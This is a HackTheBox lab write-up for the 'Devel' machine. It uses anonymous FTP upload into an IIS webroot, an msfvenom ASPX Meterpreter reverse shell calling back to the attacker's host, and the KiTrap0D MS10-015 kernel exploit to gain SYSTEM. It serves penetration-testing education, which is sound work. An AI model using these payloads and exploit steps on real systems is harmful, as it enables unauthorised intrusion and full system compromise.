j4ckdaw@site:~$

Posts

Archive

About

HTB Writeup - DEVEL

Devel was another pretty easy box, involving a misconfigured FTP server and a famous Windows kernel exploit. Let’s get started with an nmap scan:

root@kali:~# nmap -sV 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.053s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

If we try the IP in a browser, we’ll get a boilerplate IIS landing page. It’s not much help, so we’ll move on to the FTP server. It allows anonymous access:

root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

But there’s more… it seems the FTP service also allows us to upload files anonymously!

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
09-07-19  06:41PM                    0 test.txt
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

Foothold

Given that the ftproot seems to also be the webroot, we can upload a file here and then access it using a browser. The ‘aspnet_client’ folder indicates the IIS server will handle .asp or .aspx files, so we’ll use msfvenom to generate one, then ftp to the host again to upload.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=6666 -f aspx -o gimme_shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2800 bytes
Saved as: gimme_shell.aspx
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put gimme_shell.aspx
local: gimme_shell.aspx remote: gimme_shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2836 bytes sent in 0.00 secs (17.2269 MB/s)

Now we need to set up a listener to receive the reverse shell connection. Let’s use msfconsole.

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.19
LHOST => 10.10.14.19
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.19:6666

Once we browse to gimme_shell.aspx at the remote host, we get a meterpreter session:

[*] Started reverse TCP handler on 10.10.14.19:6666 
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.19:6666 -> 10.10.10.5:49160)
[*] Sending stage (180291 bytes) to 10.10.10.5
meterpreter >

Privilege Escalation

Who are we, and what do we know about the system?

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

We’re on an x86 Windows 7 system, so there’s a decent chance of getting SYSTEM privileges immediately using KiTrap0D:

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d 
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.19
LHOST => 10.10.14.19
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 7777
LPORT => 7777
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.19:7777 
[*] Launching notepad to host the exploit...
[+] Process 1588 launched.
[*] Reflectively injecting the exploit DLL into 1588...
[*] Injecting exploit into 1588 ...
[*] Exploit injected. Injecting payload into 1588...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.19:7777 -> 10.10.10.5:49163) 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

And we’re root :)

meterpreter > cat /users/babis/desktop/user.txt.txt
meterpreter > cat /users/administrator/desktop/root.txt.txt

Thanks for reading!

  • j4ckdaw